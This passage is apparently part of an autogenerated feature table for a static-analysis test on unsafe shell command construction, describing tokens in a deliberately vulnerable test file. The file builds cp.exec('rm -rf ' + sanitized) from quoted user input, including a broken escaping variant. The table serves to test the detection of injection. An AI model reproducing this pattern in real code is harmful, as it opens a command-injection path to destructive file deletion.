name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:35 | name.replace | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:35 | name.replace | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:35 | name.replace | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:35 | name.replace | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | exceptional return of name.re ... '\\\\''") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | exceptional return of name.re ... '\\\\''") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | exceptional return of name.re ... '\\\\''") | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | exceptional return of name.re ... '\\\\''") | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | exceptional return of name.re ... '\\\\''") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | name.re ... '\\\\''") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | name.re ... '\\\\''") | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | name.re ... '\\\\''") | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | name.re ... '\\\\''") | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | name.re ... '\\\\''") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:24:178:50 | name.re ... '\\\\''") | stringConcatenatedWith | ''' -endpoint- ''' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:29:178:35 | replace | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:29:178:35 | replace | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:29:178:35 | replace | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:29:178:35 | replace | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:29:178:35 | replace | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:37:178:40 | /'/g | CalleeFlexibleAccessPath | name.replace | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:37:178:40 | /'/g | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:37:178:40 | /'/g | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:37:178:40 | /'/g | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:37:178:40 | /'/g | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:37:178:40 | /'/g | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:37:178:40 | /'/g | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:37:178:40 | /'/g | receiverName | name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:43:178:49 | "'\\\\''" | CalleeFlexibleAccessPath | name.replace | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:43:178:49 | "'\\\\''" | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:43:178:49 | "'\\\\''" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:43:178:49 | "'\\\\''" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:43:178:49 | "'\\\\''" | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:43:178:49 | "'\\\\''" | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:43:178:49 | "'\\\\''" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:43:178:49 | "'\\\\''" | receiverName | name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:54:178:56 | "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:54:178:56 | "'" | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:54:178:56 | "'" | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:54:178:56 | "'" | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:54:178:56 | "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:178:54:178:56 | "'" | stringConcatenatedWith | ''' + name.replace() -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:3 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:3 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:3 | cp | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:3 | cp | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:3 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:8 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:8 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:8 | cp.exec | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:8 | cp.exec | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:8 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:31 | cp.exec ... itized) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:31 | cp.exec ... itized) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:31 | cp.exec ... itized) | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:31 | cp.exec ... itized) | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:31 | cp.exec ... itized) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:31 | exceptional return of cp.exec ... itized) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:31 | exceptional return of cp.exec ... itized) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:31 | exceptional return of cp.exec ... itized) | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:31 | exceptional return of cp.exec ... itized) | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:2:179:31 | exceptional return of cp.exec ... itized) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:5:179:8 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:5:179:8 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:5:179:8 | exec | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:5:179:8 | exec | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:5:179:8 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:18 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:18 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:18 | "rm -rf " | enclosingFunctionBody | name sanitized ' name replace /'/g '\\'' ' cp exec rm -rf sanitized broken ' name replace /'/g ''' ' cp exec rm -rf broken | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:18 | "rm -rf " | enclosingFunctionName | sanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:18 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:18 | "rm -rf " | stringConcatenatedWith | -endpoint- sanitized | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:30 | "rm -rf ... nitized | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:30 | "rm -rf ... nitized | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:30 | "rm -rf ... nitized | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:30 | "rm -rf ... nitized | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:179:10:179:30 | "rm -rf ... nitized | contextSurroundingFunctionParameters | (name) | +| 